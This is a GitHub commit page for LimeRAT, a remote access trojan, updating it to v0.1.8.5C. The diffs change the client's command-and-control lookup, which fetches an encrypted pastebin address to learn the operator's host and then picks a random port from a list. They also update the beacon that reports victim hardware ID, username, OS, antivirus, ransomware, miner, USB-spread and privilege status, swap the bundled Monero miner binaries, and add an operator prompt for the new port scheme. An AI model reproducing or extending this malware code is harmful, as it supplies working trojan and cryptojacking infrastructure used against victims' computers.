Skip to content

Commit

Permalink
UPDATE v0.1.8.5C
Browse files Browse the repository at this point in the history
*Updated XMR miner (v2.8.3)
*Updated multi port -> example pastebin "127.0.0.1:8989:7878:5656"
  • Loading branch information
Nyrotication committed Oct 20, 2018
1 parent f7b4870 commit 19710ea
Show file tree
Hide file tree
Showing 16 changed files with 46 additions and 32 deletions.
Binary file modified .vs/LimeRAT/DesignTimeBuild/.dtbcache
Binary file not shown.
Binary file modified .vs/LimeRAT/v15/.suo
Binary file not shown.
Binary file modified .vs/LimeRAT/v15/Server/sqlite3/storage.ide
Binary file not shown.
Binary file modified .vs/LimeRAT/v15/Server/sqlite3/storage.ide-shm
Binary file not shown.
Binary file modified .vs/LimeRAT/v15/Server/sqlite3/storage.ide-wal
Binary file not shown.
2 changes: 1 addition & 1 deletion Project/Client/C_Main.vb
Original file line number Diff line number Diff line change
@@ -1,5 +1,5 @@
'##################################################################
'## N Y A N C A T ||| Updated on Sept/25/2018 ##
'## N Y A N C A T ||| Updated on Oct./20/2018 ##
'##################################################################
'## ##
'## ##
Expand Down
16 changes: 12 additions & 4 deletions Project/Client/C_TcpClient.vb
Original file line number Diff line number Diff line change
@@ -1,4 +1,6 @@
Namespace Lime
Imports System.Collections.Generic

Namespace Lime

Public Class C_TcpClient
Public Shared ENDOF As String = C_Settings.ENDOF
Expand All @@ -10,6 +12,7 @@
Public Shared MS As IO.MemoryStream = Nothing
Public Shared Tick As System.Threading.Timer = Nothing
Public Shared KA As Integer = 0
Public Shared P As New List(Of Integer)

Public Shared Sub Connect()

Expand Down Expand Up @@ -93,24 +96,29 @@ re:
C_Settings.HOST = "127.0.0.1"
C_Settings.PORT = 8989
#Else

Using WC As New Net.WebClient 'Pastebin, split by ":" IP:PORT
Try
Dim myCredentials As New Net.NetworkCredential("", "")
WC.Credentials = myCredentials
Dim Response As String = WC.DownloadString(C_Encryption.AES_Decrypt(C_Settings.Pastebin))
C_Settings.HOST = Response.Split(":")(0)
C_Settings.PORT = Response.Split(":")(1)
' Dim Response As String = WC.DownloadString((C_Settings.Pastebin))
Dim SPL = Split(Response, ":")
C_Settings.HOST = SPL(0)
Dim r As New Random
C_Settings.PORT = SPL(New Random().Next(1, SPL.Length))
WC.Dispose()
Catch ex As Exception
End Try
End Using

#End If

C.Connect(C_Settings.HOST, C_Settings.PORT)
Alive = True
MS = New IO.MemoryStream

Send(String.Concat("info", SPL, C_ID.HWID, SPL, C_ID.UserName, SPL, "v0.1.8.5B", SPL, C_ID.MyOS, " ", C_ID.Bit, SPL,
Send(String.Concat("info", SPL, C_ID.HWID, SPL, C_ID.UserName, SPL, "v0.1.8.5C", SPL, C_ID.MyOS, " ", C_ID.Bit, SPL,
C_ID.INDATE, SPL, C_ID.AV, SPL, C_ID.Rans, SPL, C_ID.XMR, SPL, C_ID.USBSP, SPL, C_Settings.PORT, SPL, C_ID.dotNET, SPL, "...", SPL, " ", SPL,
C_ID.Privileges.ToString, SPL, C_Settings.fullpath))

Expand Down
Binary file modified Project/Plugins/ENC/Resources/DECF.exe
Binary file not shown.
Binary file modified Project/Plugins/XMR/Resources/cpu.exe
Binary file not shown.
Binary file removed Project/Plugins/XMR/Resources/xm.exe
Binary file not shown.
5 changes: 1 addition & 4 deletions Project/Plugins/XMR/XMR.vbproj
Original file line number Diff line number Diff line change
Expand Up @@ -96,10 +96,7 @@
</None>
</ItemGroup>
<ItemGroup>
<None Include="Resources\xm.exe" />
</ItemGroup>
<ItemGroup>
<None Include="Resources\cpu.exe" />
<Folder Include="Resources\" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.VisualBasic.targets" />
</Project>
2 changes: 1 addition & 1 deletion Project/Server/Classes/S_Settings.vb
Original file line number Diff line number Diff line change
Expand Up @@ -3,7 +3,7 @@
Public Shared PORT As New List(Of Integer)
Public Shared EncryptionKey As String = Nothing
Public Shared IP As String = Nothing
Public Shared StubVer As String = "v0.1.8.5B"
Public Shared StubVer As String = "v0.1.8.5C"
Public Shared SPL As String = "|'L'|"
Public Shared ENDOF As String = "|'N'|"

Expand Down
2 changes: 1 addition & 1 deletion Project/Server/Forms/About.Designer.vb

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

40 changes: 20 additions & 20 deletions Project/Server/Forms/Intro.Designer.vb

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

9 changes: 9 additions & 0 deletions Project/Server/Forms/Intro.vb
Original file line number Diff line number Diff line change
Expand Up @@ -46,6 +46,7 @@
STV("Read", "1")
Catch : End Try
End If

#If DEBUG Then
' S_Settings.PORT = 8989
S_Settings.EncryptionKey = "NYANCAT"
Expand Down Expand Up @@ -88,6 +89,14 @@
Catch ex As Exception
End Try

Try
If GTV("READPORTMSG") = Nothing Then
MsgBox("New PORT system. You need to create 1 pastebin and insert you ports like this 127.0.0.1:8989:7878:5656", MsgBoxStyle.Information)
STV("READPORTMSG", "1")
End If
Catch ex As Exception
End Try

End Sub

Private Sub MetroButton2_Click(sender As Object, e As EventArgs) Handles MetroButton2.Click
Expand Down
2 changes: 1 addition & 1 deletion Project/Server/Forms/Main.vb
Original file line number Diff line number Diff line change
@@ -1,5 +1,5 @@
'##################################################################
'## N Y A N C A T ||| Updated on Sept/25/2018 ##
'## N Y A N C A T ||| Updated on Oct./20/2018 ##
'##################################################################
'## ##
'## ##
Expand Down

0 comments on commit 19710ea

Please sign in to comment.